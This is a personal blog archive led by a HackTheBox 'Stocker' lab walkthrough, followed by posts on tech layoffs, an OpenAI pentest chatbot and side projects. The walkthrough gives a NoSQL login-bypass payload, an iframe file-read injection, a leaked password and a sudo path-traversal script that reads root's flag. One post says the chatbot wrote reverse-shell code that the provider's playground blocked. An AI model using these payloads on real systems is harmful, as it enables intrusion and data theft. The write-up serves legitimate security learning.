Category Archives: Coding

HackTheBox – Stocker

HackTheBox

I started up an account recently on HackTheBox. Primarily because I’ve already done all the Active Directory related rooms on TryHackMe, but it’s another great place to learn and play.

This time I will give my walkthrough of a box on HackTheBox.com called Stocker. Overall I would rate this a Lower-Mid level box.

Initial Enumeration

------------------------------------------------------------
        Threader 3000 - Multi-threaded Port Scanner          
                       Version 1.0.7                    
                   A project by The Mayor               
------------------------------------------------------------
Enter your target IP address or URL here: 10.10.11.196
------------------------------------------------------------
Scanning target 10.10.11.196
Time started: 2023-01-30 12:07:11.973696
------------------------------------------------------------
Port 22 is open
Port 80 is open
Port scan completed in 0:01:05.023631
------------------------------------------------------------
Threader3000 recommends the following Nmap scan:
************************************************************
nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.11.196 10.10.11.196
************************************************************
Would you like to run Nmap or quit to terminal?
------------------------------------------------------------
1 = Run suggested Nmap scan
2 = Run another Threader3000 scan
3 = Exit to terminal
------------------------------------------------------------
Option Selection: 1
nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.11.196 10.10.11.196
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 12:08 JST
Nmap scan report for 10.10.11.196
Host is up (0.19s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d12971d86bc161683608f4f06e6d54e (RSA)
|   256 7c4d1a7868ce1200df491037f9ad174f (ECDSA)
|_  256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://stocker.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.89 seconds
------------------------------------------------------------
Combined scan completed in 0:01:40.621978

Port 80 is open.

Enumerating and found no robots.txt.
There is a 302 redirect on the standard port.

Added socker.htb to /etc/hosts

Ran gobuster and found a dev.stocker.htb which I also added to /etc/hosts.

I found a bug against the current version of nginx 1.18.0 that this is using, but for some reason it wasn’t working properly and the machine became unstable so I requested a reboot.

Burpsuite and NOSQL Injection

I decided to enum a little further and found that there was a vulnerability to NOSQL as found in BurpSuite.

BurpSuite Capture Login

Changing the content-type to json and putting a nosql bypass:

{"username":{"$ne":"corisan"},"password":{"$ne":"corisan"}}
BurpSuite NoSQL Injection Testing

After forwarding the packet from BurpSuite, this gets a login becuase the express evaluates to true, and we now show items on the website. If we click on an item, add it to the cart, and then add an iframe into the captured packet to show us /etc/passwd, it will give us a list of users.

BurpSuite – Post Forward get Login

Now we Add to Basket and Checkout

Post Login Checkout Basket

Embedding an iframe with path to the passwd file:

"title":"<iframe src=file:///etc/passwd height=500px width=500px></iframe>",
Embed File in an iFrame before submitting via BurpSuite

Adding the above captured _id to /api/po/ID to the site gives us the captured iframe data which is actually the contents of the /etc/passwd file:

Post Submit via BurpSuite gets us contents of /etc/passwd file.

Now we have a possible username of angoose. Remember we are looking for a non system account and one with a shell such as /bin/bash. The others just show /bin/false or /usr/sbin/nologin so those are unusable for our purpose.

Now we can the same trick to grab the site’s index.js so we can find a password.

BurpSuite iFrame injection to get contents of index.js
After Submitting Item w/ modified iFrame in BurpSuite we get the content of index.js as the Item

So now we have the password too IHeardPassphrasesArePrettySecure thanks to the coder hardcoding it into the script because they had not yet created any kind of dotevn environment or secrets database to store it in.

As an asside, a trick that coders will user is to obfuscate passwords to applications. That is to take a password and base64 encode it and store that in a file. Then read it from the application, run a base64 -d operation on it to show the true password and use it from a variable in the script. This keeps from storing the password in the script. One of the first things I like to do when enumerating for information/passwords is to see if I can find any base64 encoded files in the system.

I wrote a tool to help you scan for these kinds of base64 encoded files here on my github: https://github.com/c0ri/b64scan

SSH and First Flag

ssh angoose@10.10.11.196                                   
The authenticity of host '10.10.11.196 (10.10.11.196)' can't be established.
ED25519 key fingerprint is SHA256:jqYjSiavS/WjCMCrDzjEo7AcpCFS07X3OLtbGHo/7LQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.196' (ED25519) to the list of known hosts.
angoose@10.10.11.196's password: 

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

angoose@stocker:~$ who
angoose  pts/0        2023-01-30 04:31 (10.10.14.11)
angoose@stocker:~$ id
uid=1001(angoose) gid=1001(angoose) groups=1001(angoose)
angoose@stocker:~$ ls
user.txt
angoose@stocker:~$ cat user.txt
bce30eb254c192b18a0390a2d121822d

So I see from running sudo -l that we only have permission to run /usr/bin/node and only from /usr/local/scripts. First, let’s throw together a little .js script to read /root/root.txt file and see if we can get the system flag that way.

// -- getroot.js
const fs = require('fs');

fs.readFile('/root/root.txt', 'utf8', (err, data) => {
        if (err) {
                console.error(err);
                return;
        }
        console.log(data);
});

Now we will run it, but I use a trick to escape the /usr/local/scripts directory by just appending ../../../home/angoose/

This puts us in the correct directory to call our script from our home while still satifisfying the requirements to run the script from /usr/local/scripts, as that is where the starting path is.

angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/getroot.js 
7383fc4bc3af1080ba3815cd4beba4d9

Review

I had some intial challenges with not being able to load the site. After that I had some instability which forced me to have to request a restart on the box after running some vulnerability against nginx.

I finally had better luck just doing some poking around with Burpsuite. Once I got on the box it was quite easy to get the system flag.

Fun Level: 7/10
Initial Difficulty: 4/10
Secondary Difficulty: 4/10

Like what I do? Buy me a coffee! https://www.buymeacoffee.com/c0ri

Big Tech Job Cuts – where to go now?

Google is one of the latest companies to cut tech jobs. Some 12,000 jobs this week.

With big tech realing from some historic job losses, many tech workers maybe wondering where they should go from here.

For myself, I’ve been studying for the last 10 months or so, Cybersecurity. Like many large enterprise organisations, I’ve seen a tremendous uptick in Security related incidents. At some point I decided to turn my attention on the subject.

As I would find out some 10 months later, it’s a very good thing I did. I was one of the many hundreds of thousands that have been affected by the recent layoffs from Big Tech globally.

I’ve been doing some studying recently to see what fields are popping for the mid-term and long-term future. Here are some interesting results.

  1. Data science and analysis: With the increasing amount of data being generated, there is a growing demand for professionals who can collect, analyze, and interpret data.
  2. Cybersecurity: As technology becomes more prevalent, the need for professionals who can protect against cyber threats also increases.
  3. Cloud computing: As more companies move their operations to the cloud, there is a growing need for professionals who can design, build, and maintain cloud-based systems.
  4. Artificial intelligence and machine learning: As these technologies continue to advance, there will be a growing demand for professionals who can develop and apply AI and ML solutions to various industries.
  5. Business development and consulting: With the changing business landscape, there is a need for professionals who can help companies navigate and adapt to new technologies and market trends.
  6. Project and product management: This role involves leading cross-functional teams to deliver a product or service.

While some of these jobs maybe common sense alternatives, some might be surprising. For example, Project and product management. I think maybe for the short-term this might be important, but long term I’m not so sure.

Some of the obvious ones are AI and Cybersecurity however. I would also say that anything supporting Cloud computing is quite important. This is because so many new tools need to be made in this area to handling integration from analytics, cybersecurity and more.

If you are one of the many tech workers who has lost their jobs, I feel your pain. I put this list together to share some hope for a bright new future though. Wishing you all the best of luck as we navigate these new and uncertain times ahead.

Isis OpenAI Chatbot for Penetration Testing

It seems that I will be having some more time to work on my personal projects and also working towards my OSCP because I quit my job. I will be looking for a new gig after some needed time off, but in the meantime I’m excited to continue my studies with Penetration Testing as well as doing some coding projects that I’ve been wanting to either finish or start.

I’ve added some code to the Isis OpenAI Chatbot for Penetration Testing. This is more how I envisioned it working as a hands-free way to interact with me. There are still some quirks going on with the OpenAI that I’ve found and I will touch on these.

First, I named this project as I mentioned after the Star Trek series episode Assignment Earth’s Isis character. There was an AI that wa able to work with a character called Gary Seven to save the planet. In that light, I really added a lot of fluff to the AI code. You can tweak it to your liking. I’d also add that some of the code such as the history and training questions can and probably should be tweaked. If you re-inject those with every question, you will probably eat up tokens and money fast. So please be aware of that.

For the next things I want to do, I need to add some ability for Isis to save things like Injections, snipets and code into either files or into my working flow. To be honest when I started this project I was so shocked that Isis actually generated some totally unique reverse shell code for me in php. I had thought maybe it would look it up on the internet and post me something. It actually coded something! Interestingly I could not get the same result using the playground as the public API seems to block ‘dangerous’ code. I’m not sure how concessions would be made for legitimate penetration testers.

Isis OpenAI Chatbot for Penetration Testing is something really cool. As far as I know it was the 1st of it’s kind. This was released and within weeks, I saw other cool apps from others to follow like Github’s Copilot, which to my mind is super cool, and similar to how I envisioned Isis to begin with except I would like the choice to save code/snippets/scripts into places of my choosing.

Anyway, play around with it and see what you think. If you have any suggestions for improvements or wish to contribute, then go for it. You can find the code on my Github here:

https://github.com/c0ri/isis

Isis – AI chatbot to help you with Penetration Testing

I have been super busy lately. Doing graduate studies, and also working hard every day training for my OSCP exam. I have been very productive tho!

I made some new code for penetration testers that will help be a helper to find code inserts, shells, SQL injection and the like for you. AFAIK it’s the first of it’s kind and it uses some pretty decent AI from openAI.

I like to think of ‘her’ as an angel on my shoulder. Imagine you are under a tight deadline. A company gave you only 5 days to test their websites and report your findings. Then imagine talking to Isis while you work and having her pop up suggestions for reverse-shell code, SQL injection etc. WOOOOOoo!

My Initial work is promising, but stlll some kinks to work out. If you wanna contribute to the code that’d be cool too.

If you are interested in the code you can check it out here: https://github.com/c0ri/isis

Love what I do? https://www.buymeacoffee.com/c0ri

Haniwa Shutdown

After successfully setting up my new idea, Haniwa, and testing it for 6 months, I’ve decided to shut the project down. I got only minor interest in the concept, and the server costs were eating me alive while I was looking for investors.

I may bring it back in some simpler form in the future and make it free by generating ad’s on the site for it, but for now I’m on to bigger and better things.

Haniwa

I have been very busy lately working on a new project called Haniwa. The idea is to have a bot which will act as a servant for us after we are dead and gone. Something to carry out our last wishes. It could be like an executor of a will, but with an Artificial Intelligence about it.

Haniwa’s primary function is to let loved ones and friends know that you have passed on, but it also includes the ability to send bank accounts, secret messages, crypto account logins and more. Things you might not be ready to share now, but you surely want someone to have after you are gone. The use cases are as endless as the ideas we have for future releases!

The name Haniwa is actually a Japanese term coined from using figures to place as caretakers for Emperors after they died. Previous to that when an Emperor died, it was commanded that all his servants and family be put to death and sent with him to the afterlife. Many people decided this was barbaric, and came up with the idea to use Haniwa instead. Now I will borrow this term and give it a new meaning, a sort of Flower Robot to tend our Grave after we are dead and gone.

I’ve chosen to run this one on a platform called Bubble.is or Bubble.io now. It is a fantastic no-code application, and I am finding all kinds of niche use cases for it after using it. The best part is it allows me to quickly setup an app and prove it out and get it to a state where it can be tested quickly and as a PoC for Venture Capitalists to jump aboard without wasting too much time coding a site from the ground up.

The first revision on Haniwa is nearly complete with all of the basic features ready such as scheduling mail and secured messages using AES-256 encryption. It is also responsive in that it handles PC, Tablet and Mobile well.

My main goal now is to get it functional and bring it to market. You know the old saying “If you aren’t embarrassed of your first release, you released too late!” I know there is a lot of work to do, and features I really want to add, but it’s important to get it out there.

For me this is something new. As far as I know, there is nothing like this. The idea for it came to me in a dream. I think for myself I am excited to use it.

Does this sound like an interesting idea? Drop me a line and share your stories or suggestions for it!

When Bots Need to Text You

I’ve been writing some bot code lately to send SMS to groups.  I found the perfect API for this with Cisco’s Tropo Product.

The API is super simple to use. You can make API calls or just post to URL using CURL or Python’s urllib2 library.

The use of the service for DEV is Free, however if you need Production support and service you will want to move to Production for that. For my testing I just signed up for the free Dev service and started coding away.

To save you some time the solution for the service is something like this:

  • Sign up for an account, choosing Dev or Prod -> https://www.tropo.com/
  • Create an Application from their Portal
  • Click to add some code to /var/www/sms.py for both script boxes. You can use the same script.
  • At the bottom you need to attach a phone #. Typically this is the number closest to where you want to send SMS, however I noticed UK or EU based numbers could send more readily worldwide. For cost however, you may want to have your script set the CallerID of whatever numbers you pick based on the Country Code of the Recipients Phone. Go on and attach multiple numbers if you like.
  • Write up a script to post to the API. You can grab your API token from the bottom of your Applications Page in Tropo.

Posting is as simple as constructing a URL to the service like this: ​

https://api.tropo.com/1.0/sessions?action=create&token=TOKEN&numberToDial=11005555555&customerName=Joe+Good&msg=Tesintg+this+thing+out

That’s about it. Pretty Simple! Kudos to Tropo and Cisco for an amazing product!

If you have any questions or need help sending some SMS with your own account, then reach out to me.

 

 

Server

Been real busy at work lately so not much chance to update on Disa.

[blogcard url=”http://skyblue-soft.com/disa” title=”disa” content=”Updates on Project Disa”]

I’ve gotten another server up now and will work next on the MongoDB for the backend support. Once that’s online, I will transfer my working code over to my container and test to make sure it’s all working. Then we can do some beta testing.

Thanks!

Disa

I’ve secured some new servers on DigitalOcean for Disa. She is close to taking the next step as I’ve been beta testing the web interface for her for some time and now ready to put her on a more reliable (and faster) platform.

Once that’s done, I’ll be able to start opening her up for a limited Beta trial for some of you. If you are a subscriber, you’ll get the 1st shot at using her.

On another note, I’m really impressed with DigitalOcean. I met those guys at the Automacon in Portland a few months ago, and they really have their shit together. The service is dead simple to setup, as they use containers worded as “Droplets” to their user base. This is a great thing because they can give you exactly what you want for an extremely cheap price. It’s also very scalable as you can simple spin up more Droplets to scale up. Works well with Kubernetes if you are going big. It’s also fast as hell. If you wanna check them out, then click this link and tell them I sent you and get an instant $10 credit to your account! That’s 2 months free at the time of this writing.

What’s the Word?

Sorry I’ve been completely busy over the last few months at work. I’ve been working hard to add a web front-end to my Twitter bot, and working out how to tie in the AI modules that I’ve spend the last year on.  It was a tremendous undertaking but now I’m happy t report that it’s tied in and working well. I do however need to finish adding “moods” to my AI module before I turn it back on. I noticed after it had some discussions with folks that it would get aggressive with them and sometimes even get itself blocked for insulting their intelligence and the like. That’s definitely NOT what I want unless it’s something extremely warranted, so I’m adding some code to stabilize it’s mood and even have it change moods depending on different situations. After that I can finish pen-testing the whole rig, and make it public.

The new version is built to monetize, so I do intend to sell access in a 3-tier model.

  • TIER1: Simple access to AutoFollow and AutoUnfollow features.
  • TIER2: Access to more advanced features such as automatic fav, retweet, news & random quotes.
  • TIER3: Access to use the AI module.

I feel the AI will be a very cool feature, especially for businesses that need advertising and etc. or power users that have tons of people and need help when they are offline.

It’s possible also for users to have multiple Twitter accounts as well. I’m not so sure how to regulate that or even if I should. I just worry if I would have to charge more for that since compute and storage doeth have it’s costs. I would really love to give away this kind of ability.

If you have any ideas, drop me a line and maybe I can get it added.

Please stay tuned, I’ll post details and be giving free access to my subscribers to help beta test. I’ve been testing it for a week or so, and it all works well.

Thanks always for your support!

In friendship,

Corley